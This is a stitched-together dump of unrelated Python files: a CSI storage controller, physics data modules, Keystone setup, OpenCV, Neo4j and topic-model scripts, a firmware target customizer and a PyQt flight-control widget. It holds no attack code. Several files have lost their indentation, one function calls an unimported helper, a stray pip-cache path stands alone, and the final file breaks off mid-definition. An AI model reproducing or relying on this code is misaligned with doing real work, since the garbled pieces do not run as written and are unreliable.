csi_pb2.ControllerServiceCapability(
rpc=csi_pb2.ControllerServiceCapability.RPC(type=types.Value("EXPAND_VOLUME")))])
logger.info("finished ControllerGetCapabilities")
return res
    def __get_identity_config(self, attribute_name):
        """Return a value from the 'identity' section of the loaded config."""
        return self.cfg['identity'][attribute_name]
@handle_common_exceptions(csi_pb2.GetPluginInfoResponse)
def GetPluginInfo(self, _, context):
logger.info("GetPluginInfo")
name = self.__get_identity_config("name")
version = self.__get_identity_config("version")
if not name or not version:
message = "plugin name or version cannot be empty"
return build_error_response(message, context, grpc.StatusCode.INTERNAL, csi_pb2.GetPluginInfoResponse)
logger.info("finished GetPluginInfo")
return csi_pb2.GetPluginInfoResponse(name=name, vendor_version=version)
    def _get_volume_final_name(self, volume_parameters, name, array_mediator):
        # Delegate to the generic object-name builder with the volume type label.
        return self._get_object_final_name(volume_parameters, name, array_mediator,
                                           config.VOLUME_TYPE_NAME)
def _get_snapshot_final_name(self, volume_parameters, name, array_mediator):
name = self._get_object_final_name(volume_parameters, name, array_mediator,
config.SNAPSHOT_TYPE_NAME)
return name
def _get_object_final_name(self, volume_parameters, name, array_mediator, object_type):
prefix = ""
if volume_parameters.prefix:
prefix = volume_parameters.prefix
if len(prefix) > array_mediator.max_object_prefix_length:
raise array_errors.IllegalObjectName(
"The {} name prefix '{}' is too long, max allowed length is {}".format(
object_type,
prefix,
array_mediator.max_object_prefix_length
)
)
if not prefix:
prefix = array_mediator.default_object_prefix
full_name = self._join_object_prefix_with_name(prefix, name)
if len(full_name) > array_mediator.max_object_name_length:
hashed_name = utils.hash_string(name)
full_name = self._join_object_prefix_with_name(prefix, hashed_name)
return full_name[:array_mediator.max_object_name_length]
def _join_object_prefix_with_name(self, prefix, name):
if prefix:
return settings.NAME_PREFIX_SEPARATOR.join((prefix, name))
return name
def GetPluginCapabilities(self, _, __):
logger.info("GetPluginCapabilities")
service_type = csi_pb2.PluginCapability.Service.Type
volume_expansion_type = csi_pb2.PluginCapability.VolumeExpansion.Type
capabilities = self.__get_identity_config("capabilities")
capability_list = []
service_capabilities = capabilities.get('Service')
volume_expansion_capability = capabilities.get('VolumeExpansion')
if service_capabilities:
for service_capability in service_capabilities:
capability_list.append(
csi_pb2.PluginCapability(
service=csi_pb2.PluginCapability.Service(type=service_type.Value(service_capability))))
if volume_expansion_capability:
capability_list.append(
csi_pb2.PluginCapability(
volume_expansion=csi_pb2.PluginCapability.VolumeExpansion(
type=volume_expansion_type.Value(volume_expansion_capability))))
logger.info("finished GetPluginCapabilities")
return csi_pb2.GetPluginCapabilitiesResponse(
capabilities=capability_list
)
    def Probe(self, _, context):
        # Liveness probe: always report OK.
        context.set_code(grpc.StatusCode.OK)
        return csi_pb2.ProbeResponse()
def start_server(self):
controller_server = grpc.server(futures.ThreadPoolExecutor(max_workers=settings.CSI_CONTROLLER_SERVER_WORKERS))
csi_pb2_grpc.add_ControllerServicer_to_server(self, controller_server)
csi_pb2_grpc.add_IdentityServicer_to_server(self, controller_server)
# bind the server to the port defined above
# controller_server.add_insecure_port('[::]:{}'.format(self.server_port))
# controller_server.add_insecure_port('unix://{}'.format(self.server_port))
controller_server.add_insecure_port(self.endpoint)
logger.info("Controller version: {}".format(self.__get_identity_config("version")))
# start the server
logger.debug("Listening for connections on endpoint address: {}".format(self.endpoint))
controller_server.start()
logger.debug('Controller Server running ...')
try:
while True:
time.sleep(60 * 60 * 60)
except KeyboardInterrupt:
controller_server.stop(0)
logger.debug('Controller Server Stopped ...')
def _get_source_type_and_id(self, request):
source = request.volume_content_source
object_id = None
source_type = None
if source:
logger.info(source)
if source.HasField(config.SNAPSHOT_TYPE_NAME):
source_id = source.snapshot.snapshot_id
source_type = config.SNAPSHOT_TYPE_NAME
elif source.HasField(config.VOLUME_TYPE_NAME):
source_id = source.volume.volume_id
source_type = config.VOLUME_TYPE_NAME
else:
return None, None
object_id_info = utils.get_object_id_info(source_id, source_type)
object_id = object_id_info.object_id
return source_type, object_id
def main():
    """Parse CLI flags, configure logging, and run the controller server (blocks)."""
    parser = ArgumentParser()
    parser.add_argument("-e", "--csi-endpoint", dest="endpoint", help="grpc endpoint")
    parser.add_argument("-l", "--loglevel", dest="loglevel", help="log level")
    arguments = parser.parse_args()
    set_log_level(arguments.loglevel)
    controller_servicer = ControllerServicer(arguments.endpoint)
    controller_servicer.start_server()
# Script entry point.
if __name__ == '__main__':
    main()
|
#!/usr/bin/env python
"""
author: mzoll <marcel.zoll@fysik.su.se>
please report any errors and possible improvements to the author
"""
import os, numpy, glob
from icecube import icetray, dataclasses, dataio
from icecube.phys_services import goodrunlist
class GCD_inserter(icetray.I3PacketModule):
    """
    inserts the GCD-frames before each event that is seen.
    gets the GCD-files from the goodrunlist-info.
    NOTE: can only be used for experimental data (use the 'If'-option in the tray)
    """
    def __init__(self,context):
        super(GCD_inserter, self).__init__(context, icetray.I3Frame.DAQ)
        # frame stop types to skip when replaying the GCD file
        self.ignoreTypeList = []
        self.AddParameter("IgnoreFrameTypes",
                          "Ignore this list of frametypes from the read GCD file",
                          self.ignoreTypeList)
        self.AddParameter("Pass2",
                          "Use pass2 good run list?",
                          False)
        self.AddOutBox("OutBox")
    def Configure(self):
        super(GCD_inserter, self).Configure()
        self.ignoreTypeList = self.GetParameter("IgnoreFrameTypes")
        self.pass2 = self.GetParameter("Pass2")
        # NaN compares unequal to every run id, so the first packet always
        # triggers a GCD insertion
        self.last_seen_run = float('nan')
        self.GRL = goodrunlist.GRL(pass2 = self.pass2)
    def FramePacket(self, frames):
        """Insert the run's GCD frames ahead of the packet whenever the run id changes."""
        eh = frames[0]["I3EventHeader"]
        if eh.run_id <= 99999:
            icetray.logging.log_fatal("Events seem not to be experimental data (run_id <= 99999)")
        if self.last_seen_run==eh.run_id:
            # same run as the previous packet: pass frames through untouched
            for frame in frames:
                self.PushFrame(frame)
            return
        icetray.logging.log_info("Event with a new run_id encountered: %d; pushing in GCD-frames!"%(eh.run_id))
        if eh.run_id not in self.GRL:
            icetray.logging.log_fatal("Goodrun-lists do not contain an entry for this run (%d); cannot infer GCD-file path"%(eh.run_id))
        # clip in the gcd-file content
        gcd_file = dataio.I3File(self.GRL[eh.run_id].get_gcd_file())
        while (gcd_file.more()):
            gcd_frame = gcd_file.pop_frame()
            if gcd_frame.Stop not in self.ignoreTypeList:
                self.PushFrame(gcd_frame)
        self.last_seen_run = eh.run_id
        # push all other frames
        for frame in frames:
            self.PushFrame(frame)
        return
|
import socket
import numpy
try:
import cPickle as pickle
except ImportError:
import pickle
# Send a pickled 1x60 numpy array of ones to localhost:5555 ...
sock = socket.socket()
data= numpy.ones((1, 60))
sock.connect(('localhost',5555))
# protocol=2 keeps the pickle readable by Python 2 receivers
serialized_data = pickle.dumps(data, protocol=2)
sock.sendall(serialized_data)
sock.close()
# ... then a 1x60 array of zeros to localhost:8000.
sock = socket.socket()
data= numpy.zeros((1, 60))
sock.connect(('localhost',8000))
serialized_data = pickle.dumps(data, protocol=2)
sock.sendall(serialized_data)
sock.close()
|
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import oslo_i18n
from oslo_log import log
# NOTE(dstanek): i18n.enable_lazy() must be called before
# keystone.i18n._() is called to ensure it has the desired lazy lookup
# behavior. This includes cases, like keystone.exceptions, where
# keystone.i18n._() is called at import time.
oslo_i18n.enable_lazy()
from keystone.common import profiler
import keystone.conf
from keystone import exception
from keystone.server import common
from keystone.version import service as keystone_service
CONF = keystone.conf.CONF
def initialize_application(name,
                           post_log_configured_function=lambda: None,
                           config_files=None):
    """Bootstrap Keystone and return the WSGI application named `name`.

    :param name: paste application name (e.g. 'admin' or 'main')
    :param post_log_configured_function: hook invoked right after logging
        has been configured
    :param config_files: explicit config files; when omitted, a developer
        tree's etc/keystone.conf is used if it exists
    """
    # Locate the source tree root relative to this module.
    possible_topdir = os.path.normpath(os.path.join(
        os.path.abspath(__file__),
        os.pardir,
        os.pardir,
        os.pardir))
    dev_conf = os.path.join(possible_topdir,
                            'etc',
                            'keystone.conf')
    if not config_files:
        config_files = None
        if os.path.exists(dev_conf):
            config_files = [dev_conf]
    common.configure(config_files=config_files)
    # Log the options used when starting if we're in debug mode...
    if CONF.debug:
        CONF.log_opt_values(log.getLogger(CONF.prog), log.DEBUG)
    post_log_configured_function()
    def loadapp():
        # `name` is captured from the enclosing scope.
        return keystone_service.loadapp(
            'config:%s' % find_paste_config(), name)
    _unused, application = common.setup_backends(
        startup_application_fn=loadapp)
    # setup OSprofiler notifier and enable the profiling if that is configured
    # in Keystone configuration file.
    profiler.setup(name)
    return application
def find_paste_config():
    """Find Keystone's paste.deploy configuration file.

    Keystone's paste.deploy configuration file is specified in the
    ``[paste_deploy]`` section of the main Keystone configuration file,
    ``keystone.conf``.

    For example::

        [paste_deploy]
        config_file = keystone-paste.ini

    :returns: The selected configuration filename
    :raises: exception.ConfigFileNotFound
    """
    if CONF.paste_deploy.config_file:
        paste_config = CONF.paste_deploy.config_file
        paste_config_value = paste_config
        # Relative paths are resolved through oslo.config's file search.
        if not os.path.isabs(paste_config):
            paste_config = CONF.find_file(paste_config)
    elif CONF.config_file:
        paste_config = CONF.config_file[0]
        paste_config_value = paste_config
    else:
        # this provides backwards compatibility for keystone.conf files that
        # still have the entire paste configuration included, rather than just
        # a [paste_deploy] configuration section referring to an external file
        paste_config = CONF.find_file('keystone.conf')
        paste_config_value = 'keystone.conf'
    if not paste_config or not os.path.exists(paste_config):
        raise exception.ConfigFileNotFound(config_file=paste_config_value)
    return paste_config
def _get_config_files(env=None):
if env is None:
env = os.environ
dirname = env.get('OS_KEYSTONE_CONFIG_DIR', '').strip()
files = [s.strip() for s in
env.get('OS_KEYSTONE_CONFIG_FILES', '').split(';') if s.strip()]
if dirname:
if not files:
files = ['keystone.conf']
files = [os.path.join(dirname, fname) for fname in files]
return files
def initialize_admin_application():
    """Return the WSGI app for the admin endpoint."""
    return initialize_application(name='admin',
                                  config_files=_get_config_files())
def initialize_public_application():
    """Return the WSGI app for the public ('main') endpoint."""
    return initialize_application(name='main',
                                  config_files=_get_config_files())
|
/home/runner/.cache/pip/pool/d0/a5/47/6c47b3351e4445146ec52e7eaa10e0d8e240aed1c5c71bfb253a8515c3 |
import asyncio
import time
from aio_counter import AioCounter
async def with_ttl(loop):
    """Demo a TTL-based counter: 100 increments against max_count=10 proceed as entries expire."""
    counter = AioCounter(max_count=10, start_count=2, ttl=1, loop=loop)
    print(counter.count)
    print(time.monotonic())
    # inc() blocks when the counter is full until a slot expires (ttl=1s)
    for _ in range(100):
        await counter.inc(value=1)
    print(time.monotonic())
async def without_ttl(loop):
    """Demo the four counter operations (blocking and non-blocking) without a TTL."""
    counter = AioCounter(max_count=10, start_count=2, ttl=None, loop=loop)
    # try increment counter or wait
    await counter.inc(value=1)
    # try increment counter or raise exception
    counter.inc_nowait(value=1)
    # try decrement counter or raise exception
    counter.dec_nowait(value=1)
    # try decrement counter or wait
    await counter.dec(value=1)
async def main(loop):
    """Run both counter demos sequentially."""
    await with_ttl(loop)
    await without_ttl(loop)
if __name__ == '__main__':
    # NOTE(review): asyncio.get_event_loop() is deprecated as a way to create
    # a loop in modern Python; asyncio.run() is the current idiom — confirm
    # whether the aio_counter API still requires an explicit loop.
    loop = asyncio.get_event_loop()
    loop.run_until_complete(main(loop))
|
import numpy as np
import cv2 as cv
import sys
from threshold import threshold
from showPic import showImg
def printDilationLines(name):
    """Detect near-horizontal lines in <name>.png and draw them into <name>_out.png."""
    img_sh = threshold(name + ".png")
    # NOTE(review): the third positional argument of cv.dilate is `dst`, not
    # `iterations` — this likely should be iterations=1; confirm.
    im2 = cv.dilate(img_sh, np.ones((15, 15), np.uint8), 1)
    # Hough on (dilated - original) highlights the edges created by dilation.
    lines = cv.HoughLinesP(im2-img_sh, 1, np.pi/180, 100, minLineLength=150, maxLineGap=10)
    flat = []
    for line in lines:
        x1, y1, x2, y2 = line[0]
        # keep only lines with |slope| < 0.4 (near-horizontal)
        if getAbsTan(x1, y1, x2, y2) < 0.4:
            flat.append(line)
    print(str(len(flat))+" horizotal lines are found!")
    img = cv.imread(name + ".png")
    for line in flat:
        x1, y1, x2, y2 = line[0]
        cv.line(img, (x1, y1), (x2, y2), (0, 0, 255), 20)
    cv.imwrite(name+"_out.png", img)
def getAbsTan(x1, y1, x2, y2):
    """Return the absolute slope of the segment (x1,y1)-(x2,y2).

    Fixes: the original raised ZeroDivisionError for vertical segments
    (x1 == x2); those now return infinity, which correctly excludes them
    from the caller's "near-horizontal" filter. Also uses abs() instead of
    the manual sign branch.
    """
    if x2 == x1:
        return float('inf')
    return abs((y2 - y1) / (x2 - x1))
# Process img-000 .. img-007 in the working directory.
for i in range(0, 8):
    print("img-00"+str(i))
    printDilationLines("img-00"+str(i))
|
from py2neo import Graph, Node, Relationship
g = Graph('bolt://localhost:7687')
def get_company_all():
    """Return up to 4 company nodes as a list of dicts (company_id, name, industry)."""
    df = g.run(
        "MATCH (a :company) RETURN a.company_id as company_id, a.name as name, a.industry as industry LIMIT 4").data()
    print("\n\nDF = {}s".format(df))
    return df
def get_company_name(criteria):
    """Return up to 4 companies whose name equals `criteria`.

    Fixes: the original built the Cypher query by string concatenation,
    allowing Cypher injection through `criteria`; the value is now passed
    as a query parameter.
    """
    df = g.run(
        "MATCH (a :company) where a.name = $criteria "
        "RETURN a.company_id as company_id, a.name as name, a.industry as industry LIMIT 4",
        criteria=criteria).data()
    print("\n\nDF = {}s".format(df))
    return df
def get_company_industry(criteria):
    """Return up to 4 companies whose industry equals `criteria`.

    Fixes: the original built the Cypher query by string concatenation,
    allowing Cypher injection through `criteria`; the value is now passed
    as a query parameter.
    """
    df = g.run(
        "MATCH (a :company) where a.industry = $criteria "
        "RETURN a.company_id as company_id, a.name as name, a.industry as industry LIMIT 4",
        criteria=criteria).data()
    print("\n\nDF = {}s".format(df))
    return df
# Demo invocation when the module is run/imported.
get_company_all()
|
from docopt import docopt
from collections import OrderedDict
def get_topic_keys(f, examples=10):
    """Read a MALLET topic-keys file; return {topic_id: first `examples` key words}.

    Each line is expected as: <topic-id> <weight> <word> <word> ...
    """
    topics2keys = {}
    with open(f, "r") as topics:
        for line in topics:
            fields = line.split()
            # columns 0 and 1 are the id and weight; words start at column 2
            topics2keys[int(fields[0])] = fields[2:examples + 2]
    return topics2keys
def get_doc_topics(f):
    """Parse a MALLET doc-topics file and average topic weights per document type.

    Each line is: <id> <path> <topic0-weight> <topic1-weight> ...
    The file name embedded in <path> starts with TYPE_ALBUM or TYPE_BOOK.

    Fixes: the original crashed with ZeroDivisionError when the file
    contained no albums (or no books), and with IndexError on blank lines;
    both cases are now guarded.

    :return: OrderedDict {topic_index: {"album": avg_weight, "book": avg_weight}}
    """
    albums = 0
    books = 0
    topics2type = OrderedDict()
    with open(f, "r") as docs:
        for doc in docs:
            doc = doc.split()
            if not doc:
                # skip blank lines instead of crashing on doc[0]
                continue
            _id = doc[0]
            name = doc[1].split("/")[-1:][0].replace(".html.txt", "")
            _type = "album" if name.startswith("TYPE_ALBUM") else "book"
            if _type == "album":
                name = name.replace("TYPE_ALBUM", "")
                albums += 1
            else:
                books += 1
                name = name.replace("TYPE_BOOK", "")
            topics = doc[2:]
            for topic, value in enumerate(topics):
                if topic not in topics2type:
                    topics2type[topic] = {"album": 0, "book": 0}
                topics2type[topic][_type] += float(value)
    # normalize entries; guard against an empty category
    for topic in topics2type:
        if albums:
            topics2type[topic]["album"] /= albums
        if books:
            topics2type[topic]["book"] /= books
    return topics2type
def main():
    """Report per-topic album/book statistics and the top topics of each type."""
    # NOTE: the usage string below is parsed by docopt at runtime and must
    # not be reworded (including the 'exmaple' typo).
    args = docopt("""
    Usage:
        xxx.py [options] <doc-topics> <topic-keys>

    Options:
        --minimum NUM    Minimum probability for both book and album to show [default: 0.01]
        --examples NUM    Number of exmaple words to show [default: 10]
    """)
    topics2type = get_doc_topics(args["<doc-topics>"])
    topics2keys = get_topic_keys(args["<topic-keys>"], int(args["--examples"]))
    minimum = float(args["--minimum"])
    # topics prominent in both categories
    print("high in both")
    for topic in topics2type:
        if topics2type[topic]["album"] >= minimum and topics2type[topic]["book"] >= minimum:
            print(topic,"album:",topics2type[topic]["album"],"book:",topics2type[topic]["book"]," ".join(topics2keys[topic]))
    # rank topics by book weight and by album weight
    top = []
    for topic in topics2type:
        top.append((topics2type[topic]["book"], topics2type[topic]["album"], str(topic)+" "+" ".join(topics2keys[topic])))
    print("top book")
    for x in sorted(top, key=lambda y: y[0], reverse=True)[:10]:
        print(x[2])
    print("top metal")
    for x in sorted(top, key=lambda y: y[1], reverse=True)[:10]:
        print(x[2])
# Script entry point.
if __name__ == '__main__':
    main()
#!/usr/bin/python3
#
# Copyright (c) 2019 Foundries.io
# SPDX-License-Identifier: Apache-2.0
#
import argparse
import logging
import json
import os
import subprocess
import urllib.request
from copy import deepcopy
from tag_manager import TagMgr
logging.basicConfig(level='INFO')
fh = logging.FileHandler('/archive/customize-target.log')
fh.setFormatter(logging.getLogger().handlers[0].formatter)
logging.getLogger().addHandler(fh)
def git_hash(gitdir):
    """Return the full commit hash of HEAD in the git checkout at `gitdir`."""
    return subprocess.check_output(
        ['git', 'log', '-1', '--format=%H'], cwd=gitdir
    ).strip().decode()
def targets_from_api(factory):
    """Fetch the factory's current targets.json from the Foundries API.

    Used when creating the installed_targets file so the current
    docker-apps can be found. Returns {} when no OSF token is available
    (assumed to be a simulator build).
    """
    url = 'https://api.foundries.io/ota/repo/'
    url += factory
    url += '/api/v1/user_repo/targets.json'
    try:
        with open('/secrets/osftok') as f:
            token = f.read().strip()
    except FileNotFoundError:
        logging.warning('osftok not found, assuming a simulator build')
        return {}
    req = urllib.request.Request(url, headers={'OSF-TOKEN': token})
    with urllib.request.urlopen(req, timeout=15) as response:
        data = json.load(response)
    return data['signed']['targets']
def merge(targets_json, target_name, lmp_manifest_sha, arch, image_name,
          machine, factory, ota_lite_tag, meta_subscriber_overrides_sha):
    """Customize the current build target inside `targets_json` and save it.

    Fills in build metadata (manifest sha, arch, image file), duplicates the
    target once per extra OTA-lite tag, and copies compose-apps data forward
    from the newest older target with a matching tag.

    Fixes: the original body referenced the module-global `args`
    (args.target_name, args.targets_json) instead of its own parameters,
    making the function unusable without the CLI entry point.
    """
    with open(targets_json) as f:
        data = json.load(f)
    changed = False
    try:
        targets = data['targets']
    except KeyError:
        logging.info('Assuming installed_versions file')
        # We have a dict {ostree-hash: target-name}; convert it to targets.
        name, version = target_name.rsplit('-', 1)
        machine, _ = name.split('-lmp', 1)
        data = {
            v: {
                'hashes': {'sha256': k},
                'is_current': True,
                'custom': {
                    'targetFormat': 'OSTREE',
                    'name': name,
                    'version': version,
                    'hardwareIds': [machine],
                }
            } for k, v in data.items()
        }
        targets = targets_from_api(factory)
        targets.update(data)
        changed = True
    tagmgr = TagMgr(ota_lite_tag)
    logging.info('Target is: %r', targets[target_name])
    logging.info('Doing Target tagging for: %s', tagmgr)
    updates = []
    for idx, (tgt_tag, apps_tag) in enumerate(tagmgr.tags):
        tgt = targets[target_name]
        tgt['custom']['lmp-manifest-sha'] = lmp_manifest_sha
        tgt['custom']['arch'] = arch
        tgt['custom']['image-file'] = '{}-{}.wic.gz'.format(image_name, machine)
        if meta_subscriber_overrides_sha:
            tgt['custom']['meta-subscriber-overrides-sha'] = meta_subscriber_overrides_sha
        if idx:
            # Each additional tag gets a copy of the target with a -N suffix.
            tgt = deepcopy(tgt)
            targets[target_name + '-%d' % idx] = tgt
            changed = True
        if tgt_tag:
            tgt['custom']['tags'] = [tgt_tag]
            changed = True
        updates.append({
            'ver': int(tgt['custom']['version']),
            'tag': apps_tag,
            'tgt': tgt,
            'prev': None,
        })
    # Now find the previous version of each target.
    for tgt in targets.values():
        for cur in updates:
            if tgt['custom'].get('name') == cur['tgt']['custom']['name']:
                tag = cur['tag']
                match_tag = not tag or tag in tgt['custom'].get('tags', [])
                tgt_ver = int(tgt['custom']['version'])
                prev_ver = 0
                if cur['prev']:
                    prev_ver = int(cur['prev']['custom']['version'])
                if match_tag and tgt_ver > prev_ver and tgt_ver < cur['ver']:
                    cur['prev'] = tgt
    # Carry compose-apps information forward from each previous target.
    for u in updates:
        if u['prev']:
            logging.info('Prev is: %r', u['prev'])
            apps = u['prev']['custom'].get('docker_compose_apps')
            if apps:
                logging.info('Updating build to have compose apps: %r', apps)
                u['tgt']['custom']['docker_compose_apps'] = apps
            sha = u['prev']['custom'].get('containers-sha')
            if sha:
                u['tgt']['custom']['containers-sha'] = sha
            apps_uri = u['prev']['custom'].get('compose-apps-uri')
            if apps_uri:
                u['tgt']['custom']['compose-apps-uri'] = apps_uri
            changed = True
    if changed:
        logging.info('Target has changed, saving changes')
        with open(targets_json, 'w') as f:
            json.dump(data, f, indent=2)
def get_args():
    """Parse the customize-target CLI arguments."""
    parser = argparse.ArgumentParser(
        '''Do LMP customiziations of the current build target. Including
        copying Compose Apps defined in the previous build target.''')
    parser.add_argument('factory')
    parser.add_argument('ota_lite_tag')
    parser.add_argument('machine')
    parser.add_argument('image_name')
    parser.add_argument('image_arch')
    parser.add_argument('targets_json')
    parser.add_argument('target_name')
    # repo locations default to the CI checkout paths
    parser.add_argument('--manifest-repo',
                        default=os.environ.get('MANIFEST_REPO', '/srv/oe/.repo/manifests'))
    parser.add_argument('--meta-sub-overrides-repo',
                        default=os.environ.get('META_SUB_OVERRIDES_REPO', '/srv/oe/layers/meta-subscriber-overrides'))
    return parser.parse_args()
# Entry point: compute the overrides sha (if the layer was fetched) and merge.
if __name__ == '__main__':
    args = get_args()
    if os.path.exists(args.meta_sub_overrides_repo):
        overrides_sha = git_hash(args.meta_sub_overrides_repo)
    else:
        logging.info("meta-subscriber-overrides layer/repo wasn't fetched")
        overrides_sha = None
    merge(args.targets_json, args.target_name, git_hash(args.manifest_repo),
          args.image_arch, args.image_name, args.machine, args.factory,
          args.ota_lite_tag, overrides_sha)
|
def ZG_rprod(X, Y):
    """Scale each row i of X by Y[i].

    1-D X is treated as a column vector. On a shape mismatch (Y not 1-D of
    length n) the original contract is kept: print 'rprod error' and return
    None.

    Improvement: the original materialized np.matmul(Y[:,None], ones((1,m)))
    just to broadcast; NumPy broadcasting gives the same result without the
    temporary (n x m) matrix.
    """
    if len(X.shape) < 2:
        X = X[:, None]
    n, m = X.shape
    if Y.shape[0] != n or len(Y.shape) != 1:
        print('rprod error')
        return None
    return X * Y[:, None]
|
from typing import Any
from typing import Dict
from typing import List
from typing import NamedTuple
from typing import Optional
from typing import Type
from typing import Union
from pyannotate_runtime.collect_types import InternalType
from pyannotate_runtime.collect_types import resolve_type
from ntgen.config import Config
from ntgen.config import IS_PY_37_COMPATIBLE
from ntgen.utils import normalize_class_name
from ntgen.utils import normalize_field_name
class NT(NamedTuple):
    """
    Contains meta data of a future NamedTuple definition.

    The NT class contains meta data which may be rendered as a single or multiple NamedTuple definitions. An instance of the class
    may be created using a direct class initialization or by parsing a dictionary using the parse_dict class method.
    """

    # attributes discovered for this structure (insertion order preserved)
    attrs: List["Attribute"]  # type: ignore
    # raw (un-normalized) name of the structure
    name: str

    def __repr__(self) -> str:
        """Format the structure name to be a Pythonic class identifier."""
        return normalize_class_name(self.name)

    def repr_type_hint(self) -> str:
        """Return a string representing a type hint for the attribute."""
        return f"'{repr(self)}'"

    @property
    def nt_attrs(self) -> List["Attribute"]:
        """Return a list of all the 'user defined' type attributes of the data structure."""
        return [attr for attr in self.attrs if attr.is_user_defined]

    @property
    def builtin_type_attrs(self) -> List["Attribute"]:
        """Return a list of all the builtin type attributes in the data structure."""
        return [attr for attr in self.attrs if not attr.is_user_defined]

    @classmethod
    def parse_dict(cls, data: Dict[str, Any], name: str, config: Config, level: int = 0) -> Optional["NT"]:
        """
        Parse a given dictionary to identify future NamedTuple metadata.

        :param data: dictionary to be parsed
        :param name: name of the future NamedTuple
        :param config: Config instance
        :param level: prevents the method from creating too deeply-nested NamedTuple definitions
        :return: An instance of the NT class if it's non-empty (i.e. it contains any attributes)
        """
        if not isinstance(data, dict):
            return None
        should_nest = config.max_level is None or level < config.max_level
        attrs = []
        for attr_name, attr_value in data.items():
            # Recurse first; keep the nested NT only when nesting is still
            # allowed, otherwise fall back to pyannotate's inferred type.
            nt = NT.parse_dict(data=attr_value, name=attr_name, level=level + 1, config=config)
            attribute_type = nt if nt and should_nest else resolve_type(attr_value)
            attrs.append(Attribute(original_name=attr_name, type=attribute_type, value=attr_value))
        return NT(attrs=attrs, name=name) if attrs else None
class Attribute(NamedTuple):
    """
    A class representing metadata of a future NamedTuple definition attribute.

    The class stores metadata about a NamedTuple attribute, namely:
    - the attribute name
    - inferred attribute type
    - original value of the attribute used to infer the type

    The attribute type may be one of:
    - NoneType
    - built-in types which cannot be parameterized such as str, int, float, etc.
    - pyannotate type in case if the attribute will be rendered as a built-in parameterizable type, e.g. Dict[T,T], Tuple[T, int]
    - NT object if the attribute will be rendered as a NamedTuple definition
    """

    # attribute name exactly as it appeared in the parsed dictionary
    original_name: str
    # inferred type (see class docstring for the possible kinds)
    type: Union[InternalType, NT, Type[None]]
    # original value the type was inferred from
    value: Any

    @property
    def repr_field_name(self) -> str:
        """Return the attribute name normalized to be a valid pythonic NamedTuple field name."""
        return normalize_field_name(name=self.original_name, leading_undescores_prefix=None)

    @property
    def repr_type_hint(self) -> str:
        """Return a string representing a type hint for the attribute."""
        if self.type is type(None):  # noqa: E721 # there's no other way to check for NoneType
            return "None"
        if isinstance(self.type, type):
            return self.type.__name__
        if isinstance(self.type, NT) and not IS_PY_37_COMPATIBLE:
            # pre-3.7 rendering needs the forward-reference quoting
            return f"'{repr(self.type)}'"
        return repr(self.type)

    @property
    def is_user_defined(self) -> bool:
        """Return True if the attribute will be rendered as a user defined type (namely a NamedTuple)."""
        return isinstance(self.type, NT)
|
def checkstr(arm):
    """Return True iff every pairwise absolute difference in `arm` is >= max(arm).

    Improvements over the original: uses itertools.combinations instead of
    nested index loops, short-circuits with all(), and drops the leftover
    debug print statements. A single-element (or empty-difference) input
    trivially satisfies the property, matching the original's count logic.
    """
    diffs = [abs(a - b) for a, b in combinations(arm, 2)]
    return all(d >= max(arm) for d in diffs)
# Demo: a single-element list trivially satisfies the property.
arm=[0]
if(checkstr(arm)):
    print("yes")
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from config import gLocalIP
from config import gLocalPort
from config import gSaveDataFileFullName
from config import gFlyerInitDoneStr
from config import gKeyAcceletorPidStep
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.uic import loadUiType, loadUi
from widget.wave_widget import FCWaveWidget
# 协议帧
from frame.down import FCDownFrame, FCCtrlStartFrame, FCCtrlStopFrame
class FCOnlineWidget(QWidget):
    """Online control/telemetry widget: sends control frames down to the flyer
    and renders incoming telemetry (console text, Euler angles, waveforms)."""
    # Signal used to hand a down-frame to the transport layer.
    sSendDownFrame = pyqtSignal(FCDownFrame, name = 'sSendDownFrame')
    def __init__(self, uiFile):
        super(FCOnlineWidget, self).__init__()
        # Load and apply the .ui file
        UIClass = loadUiType(uiFile)
        self.mUi = UIClass[0]()
        self.mUi.setupUi(self)
        # Embed the waveform widget
        self.mWaveWidget = FCWaveWidget()
        self.mWaveGroupBox = self.mUi.waveGroupBox
        vbox = QVBoxLayout()
        vbox.addWidget(self.mWaveWidget)
        self.mWaveGroupBox.setLayout(vbox)
        # Basic configuration labels (local IP / port / data file path)
        self.mIpLabel = self.mUi.ipLabel
        self.mPortLabel = self.mUi.portLabel
        self.mDataPathLabel = self.mUi.dataPathLabel
        self.mIpLabel.setText("IP:" + str(gLocalIP))
        self.mPortLabel.setText("端口:" + str(gLocalPort))
        self.mDataPathLabel.setText("信息保存到:" + str(gSaveDataFileFullName))
        # Console text output
        self.mConsolePlainTextEdit = self.mUi.consolePlainTextEdit
        # Sampling frame control
        # sampling interval
        self.mIntervalLineEdit = self.mUi.intervalLineEdit
        # Throttle control
        self.mAcceleratorSpinBox = self.mUi.acceleratorSpinBox
        self.mStartPushButton = self.mUi.startPushButton
        self.mStopPushButton = self.mUi.stopPushButton
        self.mStartPushButton.clicked.connect(self.Start)
        self.mStopPushButton.clicked.connect(self.Stop)
        # Live-telemetry labels
        self.mRunTimeLabel = self.mUi.runTimeLabel
        self.mThetaLabel = self.mUi.thetaLabel
        self.mPhiLabel = self.mUi.phiLabel
        self.mPsiLabel = self.mUi.psiLabel
        # Focus policy so this widget receives key events
        self.setFocusPolicy(Qt.StrongFocus)
        # Count of received sample frames
        self.frame_count = 0
    def closeEvent(self, event):
        super(FCOnlineWidget, self).closeEvent(event)
    def Capture(self, downFrameClass):
        """Send a capture-request frame built with the configured interval."""
        self.mIntervalLineEdit.setEnabled(False)
        interval = int(self.mIntervalLineEdit.text())
        downFrame = downFrameClass(interval)
        self.SendDownFrame(downFrame)
    def Start(self):
        """Send a start-control frame with the current throttle value."""
        accelerator = int(self.mAcceleratorSpinBox.text())
        downFrame = FCCtrlStartFrame(accelerator)
        self.SendDownFrame(downFrame)
    def Stop(self):
        """Send a stop-control frame."""
        downFrame = FCCtrlStopFrame()
        self.SendDownFrame(downFrame)
    def SendDownFrame(self, frame):
        # Emit for the transport layer to actually send.
        self.sSendDownFrame.emit(frame)
    def RecvNewUpFrame(self, frame):
